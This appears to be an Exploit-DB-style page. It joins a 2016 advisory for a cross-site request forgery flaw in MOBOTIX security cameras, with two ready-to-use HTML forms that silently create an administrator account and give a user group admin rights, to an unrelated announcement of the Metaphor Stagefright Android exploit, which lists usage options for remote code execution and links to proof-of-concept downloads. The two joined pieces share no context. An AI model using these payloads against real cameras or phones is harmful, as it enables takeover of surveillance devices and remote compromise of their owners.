https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39650.zip
<!--
MOBOTIX Video Security Cameras CSRF Add Admin Exploit
Vendor: MOBOTIX AG
Product web page: https://www.mobotix.com
Affected version: [Model]: D22M-Secure, [HW]: T2r1.1.AA, 520 MHz, 128 MByte RAM, [SW]: MX-V3.5.2.23.r3
[Model]: Q24M-Secure, [HW]: T2r3.1, 806 MHz, [SW]: MX-V4.1.10.28
[Model]: D14D-Secure, [HW]: T2r4.2b, 806 MHz, 256 MByte RAM, [SW]: MX-V4.1.4.70
[Model]: M15D-Secure, [HW]: T3r4.4, 806 MHz, [SW]: MX-V4.3.4.50
Summary: MOBOTIX is a German System Manufacturer of Professional Video
Management (VMS) and Smart IP Cameras. These cameras support all standard
features of MOBOTIX IP cameras like automatic object detection, messaging
via network and onboard or network recording. The dual lens thermal system
supports additionally a second optical video sensor with 6-megapixel resolution.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Linux 2.6.37.6+
thttpd/2.19-MX
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5312
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5312.php
25.02.2016
-->
Add admin user Testingus:
-------------------------
<html>
<body>
<form action="http://10.0.0.17/admin/access" method="POST">
<input type="hidden" name="user_name_0" value="admin" />
<input type="hidden" name="user_group_0" value="admins" />
<input type="hidden" name="user_passwd_a_0" value="***" />
<input type="hidden" name="user_passwd_b_0" value="***" />
<input type="hidden" name="user_name_2" value="Testingus" />
<input type="hidden" name="user_group_1" value="admins" />
<input type="hidden" name="user_passwd_a_2" value="l33tp4ss" />
<input type="hidden" name="user_passwd_b_2" value="l33tp4ss" />
<input type="hidden" name="sv_passwd_a" value="" />
<input type="hidden" name="sv_passwd_b" value="" />
<input type="hidden" name="super_pin_1" value="" />
<input type="hidden" name="super_pin_2" value="" />
<input type="hidden" name="save_config" value="Set" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Add group 'users' to admin area:
--------------------------------
<html>
<body>
<form action="http://10.0.0.17/admin/acl" method="POST">
<input type="hidden" name="group_allow_guest_global" value="on" />
<input type="hidden" name="group_allow_live_global" value="on" />
<input type="hidden" name="group_allow_player_global" value="on" />
<input type="hidden" name="group_allow_multiview_global" value="on" />
<input type="hidden" name="group_allow_pda_global" value="on" />
<input type="hidden" name="group_allow_mxcc_global" value="on" />
<input type="hidden" name="group_allow_info_global" value="on" />
<input type="hidden" name="group_allow_imagelink_global" value="on" />
<input type="hidden" name="group_allow_api_global" value="on" />
<input type="hidden" name="group_allow_image_setup_0" value="on" />
<input type="hidden" name="group_allow_event_setup_0" value="on" />
<input type="hidden" name="group_name_1" value="guests" />
<input type="hidden" name="group_name_2" value="users" />
<input type="hidden" name="group_allow_admin_2" value="on" />
<input type="hidden" name="group_allow_image_setup_2" value="on" />
<input type="hidden" name="group_allow_event_setup_2" value="on" />
<input type="hidden" name="new_group" value="" />
<input type="hidden" name="save_config" value="Set" />
<input type="hidden" name="more_or_less" value="less" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Source: https://github.com/NorthBit/Metaphor
Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd.
Link to whitepaper: https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf
Twitter: https://twitter.com/High_Byte
Metaphor's source code is now released! The source include a PoC that generates MP4 exploits in real-time and bypassing ASLR. The PoC includes lookup tables for Nexus 5 Build LRX22C with Android 5.0.1. Server-side of the PoC include simple PHP scripts that run the exploit generator - I'm using XAMPP to serve gzipped MP4 files. The attack page is index.php.
The exploit generator is written in Python and used by the PHP code.
usage: metaphor.py [-h] [-c CONFIG] -o OUTPUT {leak,rce,suicide} ...
positional arguments:
{leak,rce,suicide} Type of exploit to generate
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
Override exploit configuration
-o OUTPUT, --output OUTPUT
Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosting this project to achieve all the goals.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39640.zip